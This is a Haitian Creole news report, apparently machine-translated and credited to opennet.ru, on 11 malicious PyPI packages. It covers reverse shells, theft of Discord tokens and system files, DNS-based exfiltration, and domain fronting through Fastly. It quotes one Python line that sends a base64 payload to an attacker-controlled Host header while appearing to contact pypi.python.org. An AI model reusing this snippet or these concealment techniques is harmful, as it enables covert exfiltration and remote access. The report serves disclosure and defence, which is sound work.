Nan anyè PyPI (Python Package Index), yo te idantifye 11 pakè ki gen kòd move. Anvan pwoblèm yo te idantifye, pakè yo te telechaje apeprè 38 mil fwa an total. Pake move detekte yo remakab paske yo sèvi ak metòd sofistike pou kache chanèl kominikasyon ak sèvè atakè yo.
- importantpackage (6305 downloads), important-package (12897) - etabli yon koneksyon ak yon sèvè ekstèn anba laparans pou konekte ak pypi.python.org pou bay aksè shell nan sistèm nan (koki ranvèse) epi itilize pwogram nan trevorc2 kache a. kanal kominikasyon.
- pptest (10001), ipboards (946) - itilize DNS kòm yon kanal kominikasyon pou transmèt enfòmasyon sou sistèm nan (nan premye pake a non lame a, anyè k ap travay, IP entèn ak ekstèn, nan dezyèm lan - non itilizatè a ak non lame) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - idantifye siy sèvis Discord nan sistèm lan epi voye li bay yon lame ekstèn.
- trrfab (287) - voye idantifyan an, non lame ak sa ki nan /etc/passwd, /etc/hosts, /home bay lame ekstèn lan.
- 10Cent10 (490) - etabli yon koneksyon koki inverse ak yon lame ekstèn.
- yandex-yt (4183) - montre yon mesaj sou sistèm nan konpwomèt ak redireksyon sou yon paj ak plis enfòmasyon sou lòt aksyon yo te pibliye atravè nda.ya.ru (api.ya.cc).
An patikilye, se metòd pou jwenn aksè nan lame ekstèn yo itilize nan pakè enpòtan yo ak pakè enpòtan yo, ki te itilize rezo livrezon kontni Fastly yo itilize nan anyè PyPI pou kache aktivite yo. An reyalite, demann yo te voye bay sèvè pypi.python.org (ki gen ladan espesifye non python.org nan SNI andedan demann HTTPS la), men header HTTP "Host" te gen ladan non sèvè kontwole pa atakè yo (sec. forward.io. global.prod.fastly.net). Rezo livrezon kontni an voye yon demann menm jan an bay sèvè atak la, lè l sèvi avèk paramèt koneksyon TLS la nan pypi.python.org lè w ap transmèt done.
Enfrastrikti PyPI a mache ak rezo livrezon kontni Fastly, ki itilize proxy transparan Varnish pou kachèt demann tipik yo, epi tou li sèvi ak pwosesis sètifika TLS nan nivo CDN, olye ke nan fen serveurs yo, pou voye demann HTTPS atravè yon prokurasyon. Kèlkeswa lame a sib, demann yo voye bay prokurasyon an, ki detèmine lame a vle lè l sèvi avèk HTTP "Hôte" header la, ak non domèn lame yo mare nan adrès IP CDN balanse chaj ki tipik pou tout kliyan Fastly.
Sèvè atakè yo tou anrejistre ak CDN Fastly, ki bay plan gratis pou tout moun e menm pèmèt anrejistreman anonim. Li enpòtan pou remake ke yo voye demann bay viktim nan lè w ap kreye yon "koki ranvèse", yo itilize yon konplo tou, men inisye soti nan bò lame atakè a. Soti nan deyò a, entèraksyon ak sèvè atakè yo sanble yon sesyon lejitim ak anyè PyPI, chiffres lè l sèvi avèk yon sètifika PyPI TLS. Yon teknik menm jan an, ke yo rekonèt kòm "domain fronting," te deja itilize aktivman pou kache non lame a lè yo te kontourne bloke, lè l sèvi avèk kapasite yo bay nan kèk rezo CDN pou jwenn aksè nan HTTPS lè yo endike yon lame fiktif nan SNI a ak aktyèlman transmèt non an nan. demann lame nan header HTTP Host andedan yon sesyon TLS.
Pou kache aktivite move, yo te itilize pake TrevorC2 anplis pou fè entèraksyon ak sèvè a menm jan ak navigasyon entènèt regilye, pou egzanp, demann move yo te voye anba laparans telechaje imaj la "https://pypi.python.org/images/ guid=" ak enfòmasyon kodaj nan paramèt guid. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request (url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Pake pptest ak ipboards yo te itilize yon apwòch diferan pou kache aktivite rezo a, ki baze sou kode enfòmasyon itil nan demann nan sèvè dns la. Malveyan an transmèt enfòmasyon lè yo fè demann DNS tankou "nu4timjagq4fimbuhe.example.com", kote done yo transmèt nan sèvè kontwòl la kode lè l sèvi avèk fòma base64 nan non subdomain. Atakè a resevwa mesaj sa yo lè li kontwole sèvè dns la pou domèn example.com la.
Sous: opennet.ru